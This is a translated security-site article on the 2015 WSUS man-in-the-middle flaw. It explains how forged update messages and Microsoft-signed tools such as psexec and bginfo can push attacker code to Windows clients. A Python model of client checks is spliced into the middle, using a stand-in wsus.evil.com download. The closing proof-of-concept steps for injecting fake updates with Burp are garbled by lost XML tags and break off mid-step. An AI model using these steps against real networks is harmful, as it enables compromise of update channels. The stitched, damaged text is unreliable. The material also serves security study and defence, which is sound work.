Black Hat topic: WSUS exploitation, theory and practice (vulnerability alert, 黑吧安全网)

2015-08-29T00:00:00
ID MYHACK58:62201566320
Type myhack58
Reporter Anonymous (佚名)
Modified 2015-08-29T00:00:00

Description

Paul Stone and Alex Chapman presented a vulnerability in Windows Server Update Services (WSUS) at Black Hat 2015. An attacker can exploit it with a man-in-the-middle (MITM) attack, causing clients to download and install fake updates.

As is well known, Microsoft delivers updates to users through the Windows Update service. The client periodically runs wuauclt.exe to contact the update server and check whether new updates are available; if there are, it downloads and installs them. In an enterprise environment, thousands of clients repeatedly downloading the same updates is an obvious waste of bandwidth, and administrators have little effective control over which updates get installed. Windows Server Update Services (WSUS) solves this problem: it acts as an update proxy server, downloading updates from the Internet, caching them locally and serving them to the other Windows computers on the network. Those computers then download updates from the WSUS server rather than from the Internet.

1. Client WSUS connection settings

In the registry, check the value UseWUServer under HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU: 1 means the WSUS setting is enabled, 0 means it is disabled. The WSUS connection setting itself is the WUServer value under HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate, for example http://wsus-server.com:8530, where http is the underlying connection protocol, wsus-server.com is the WSUS server name and 8530 is the port number.

Of course, if the WSUS server supports it, https can be used instead of http. Microsoft's default setting, however, is http, and most businesses are unwilling to bear the hefty cost of a certificate just to support https.

2. WSUS protocol

WSUS wraps SOAP XML messages in HTTP to communicate.
The client first tells the update server which updates it already has installed (SyncUpdates). The update server replies with a result (SyncUpdatesResult) describing which new updates it can offer to the client. The client then asks for the details of those new updates (GetExtendedUpdateInfo), and finally the server returns the details (GetExtendedUpdateInfoResult). As the figure shows, SyncUpdates is sent twice: the first time for software updates, the second for hardware driver updates.

[Figure: WSUS message sequence]

Based on the figure above, an intuitive example:
1. Client: regarding software updates, I have installed updates No. 1, No. 2 and No. 3. Are there any new updates?
2. WSUS server: yes! I have the details of update No. 4; you can install it.
3. (Hardware sync omitted)
4. (Hardware sync result omitted)
5. Client: then I want to install software update 4. Can you give me the details?
6. WSUS server: okay, you can download update 4 from http://1.2.3.4/update/4.cab; note that its SHA-1 hash is A1...FF.

After downloading, the client checks the update's hash value and signature. If everything checks out, the client installs the update automatically or prompts the user to install it manually.

3. Risk

By default the WSUS server supports only http. http itself is not secure: it guarantees neither message confidentiality nor integrity, and it gives the client no way to authenticate the server. An attacker can therefore use a MITM attack to hijack the WSUS communication and insert fake update information to deceive the client. There are many ways to get into a man-in-the-middle position, such as ARP spoofing; they are not discussed in depth here. This article focuses on how to forge WSUS messages.
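The settings in section 1, the four-message exchange in section 2 and the risk in section 3, as an added example that is not part of the original article or of the Black Hat PoC. It models what a WSUS client can check on its side: it parses the WUServer policy value, extracts the new update IDs from a SyncUpdatesResult and the file URL plus digest from a GetExtendedUpdateInfoResult, then runs the hash check against a legitimate and an attacker-supplied file location. The SOAP bodies are constructed, namespace-free simplifications; element names beyond those the article mentions (NewUpdates, UpdateInfo, FileLocations, FileLocation, FileDigest, Url), the base64 encoding of the SHA-1 digest, the sample payload bytes and the hypothetical URLs are assumptions.

```python
# Added example (not from the article or the WSUSpect PoC): a model of the
# WSUS client-side checks for the settings in section 1, the four-message
# exchange in section 2 and the risk in section 3. The SOAP bodies are
# constructed, namespace-free simplifications of the ClientWebService
# messages; element names beyond those the article uses are assumptions.
import base64
import hashlib
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Section 1: the policy values a domain-joined client reads from
# HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate (constructed sample).
WU_POLICY = {"UseWUServer": 1, "WUServer": "http://wsus-server.com:8530"}


def read_wu_policy():
    """Read the real values on a Windows host; returns None elsewhere."""
    try:
        import winreg  # Windows only
    except ImportError:
        return None
    base = r"SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate"
    policy = {}
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, base + r"\AU") as k:
            policy["UseWUServer"] = winreg.QueryValueEx(k, "UseWUServer")[0]
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, base) as k:
            policy["WUServer"] = winreg.QueryValueEx(k, "WUServer")[0]
    except OSError:  # key or value absent: no WSUS policy applied
        pass
    return policy


def wsus_transport(policy):
    """Return (mode, host, port, plaintext) for the client's update source."""
    if policy.get("UseWUServer") != 1:
        return ("windows-update", None, None, False)
    u = urlparse(policy["WUServer"])
    port = u.port or (443 if u.scheme == "https" else 80)
    return ("wsus", u.hostname, port, u.scheme == "http")


# Section 2: constructed SyncUpdatesResult announcing update 4 as new.
SYNC_UPDATES_RESULT = """<SyncUpdatesResult>
  <NewUpdates>
    <UpdateInfo><ID>4</ID><Deployment><Action>Install</Action></Deployment></UpdateInfo>
  </NewUpdates>
</SyncUpdatesResult>"""


def ext_info(url, payload):
    """Constructed GetExtendedUpdateInfoResult with one file location whose
    FileDigest is the base64 SHA-1 of `payload` (assumed encoding)."""
    digest = base64.b64encode(hashlib.sha1(payload).digest()).decode()
    return (f"<GetExtendedUpdateInfoResult><FileLocations><FileLocation>"
            f"<FileDigest>{digest}</FileDigest><Url>{url}</Url>"
            f"</FileLocation></FileLocations></GetExtendedUpdateInfoResult>")


LEGIT_CAB = b"MSCF constructed cabinet bytes for update 4"   # constructed
EVIL_EXE = b"MZ constructed evil.exe bytes"                  # constructed
EXT_LEGIT = ext_info("http://wsus-server.com:8530/Content/4.cab", LEGIT_CAB)
EXT_FORGED = ext_info("http://wsus.evil.com/update/evil.exe", EVIL_EXE)  # MITM


def new_update_ids(sync_result_xml):
    """IDs the server (or a MITM) claims are new for this client."""
    root = ET.fromstring(sync_result_xml)
    return [u.findtext("ID") for u in root.iter("UpdateInfo")]


def file_locations(ext_result_xml):
    """(url, base64 sha1) pairs the client will download and verify."""
    root = ET.fromstring(ext_result_xml)
    return [(f.findtext("Url"), f.findtext("FileDigest"))
            for f in root.iter("FileLocation")]


def digest_ok(blob, digest_b64):
    """The client's hash check after download."""
    return hashlib.sha1(blob).digest() == base64.b64decode(digest_b64)


# Section 3: what a client-side check can and cannot catch.
def assess_download(policy, url, digest_b64, blob):
    """Findings a hardened client could raise for one advertised file.
    The digest never fails when the attacker chose it, so only transport and
    origin are informative, and over plaintext http a MITM rewrites those too.
    """
    mode, wsus_host, _, plaintext = wsus_transport(policy)
    findings = []
    if not digest_ok(blob, digest_b64):
        findings.append("digest mismatch")
    u = urlparse(url)
    if u.scheme != "https":
        findings.append("plaintext download url")
    if mode == "wsus" and u.hostname != wsus_host:
        findings.append(f"download host {u.hostname} differs from WSUS host {wsus_host}")
    if plaintext:
        findings.append("WUServer is http: update metadata can be forged by a MITM")
    return findings


if __name__ == "__main__":
    print("transport:", wsus_transport(read_wu_policy() or WU_POLICY))
    print("new updates:", new_update_ids(SYNC_UPDATES_RESULT))
    for label, xml, blob in (("legit", EXT_LEGIT, LEGIT_CAB), ("forged", EXT_FORGED, EVIL_EXE)):
        url, digest = file_locations(xml)[0]
        print(label, url, assess_download(WU_POLICY, url, digest, blob))
```

The point the forged case makes is the one the article argues: the SHA-1 check passes for evil.exe because the attacker chose the digest, and with WUServer set to http every field the client could otherwise compare against (origin host, scheme) travels over the same unauthenticated channel. Only the signature check, discussed next, is independent of the transport.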
The attacker can insert a forged update ID into SyncUpdatesResult and then supply a fake URL and so on in GetExtendedUpdateInfoResult, tricking the client into downloading and installing it, as shown below.

[Figure: forged WSUS exchange]

An example attack:
1. Client: regarding software updates, I have installed updates No. 1, No. 2 and No. 3. Are there any new updates?
2. WSUS server: no.
3. Attacker: yes! I have the details of update No. 4; you can install it.
4. (Hardware sync omitted)
5. (Hardware sync result omitted)
6. Client: then I want to install software update 4. Can you give me the details?
7. Attacker: sure, you can download update 4 from http://wsus.evil.com/update/evil.exe; note that its SHA-1 hash is BF...EF.

In this case the client will download evil.exe from http://wsus.evil.com/update/. Note that there is one more layer of protection: every downloaded software update must carry a Microsoft signature. If signature verification fails, the downloaded update is deleted immediately. Microsoft's signature is hard to forge, so is there really no way? In fact there is no need to forge a signature. Think of the software that already carries Microsoft's signature, especially the Sysinternals tools, many of which can be used to do bad things: psexec and bginfo, for example, are both Microsoft-signed programs. (The first thing that comes to mind is cmd.exe, but cmd.exe does not actually carry an embedded Microsoft signature.)
1. psexec: a lightweight telnet-style remote execution tool (http://baike.baidu.com/view/555225.htm)
2. bginfo: can execute VBS scripts (https://technet.microsoft.com/zh-cn/2007.08.utilityspotlight)

Thus the attacker can disguise psexec or bginfo as an update, supply an installation script through the update's configuration, and push it to the client, where it is installed and run.

4. Proof of Concept (POC)

The POC provided by Paul Stone and Alex Chapman seems to have some bugs; at least I could not get it to work.
Here I provide a POC that I modified myself. Its aim is to disguise bginfo as an update and push it to the client so that it downloads and installs it. Locally I used Burp Suite to intercept and modify the WSUS messages.

1. Insert the following into the first SyncUpdatesResult message, before the element whose value is false (the XML tags were lost when this page was extracted; only the element values survive):

19999992 199992 Bundle true 2015-08-20 0 0 0 0 true

19999993 199993 Install true 2015-08-20 0 0 0 0 true

2. The second SyncUpdatesResult message concerns hardware drivers; forward it without modification.
3. Delete 19999992 and 19999993 from the GetExtendedUpdateInfo message, then forward it.
4. In the GetExtendedUpdateInfoResult message, in the ... add
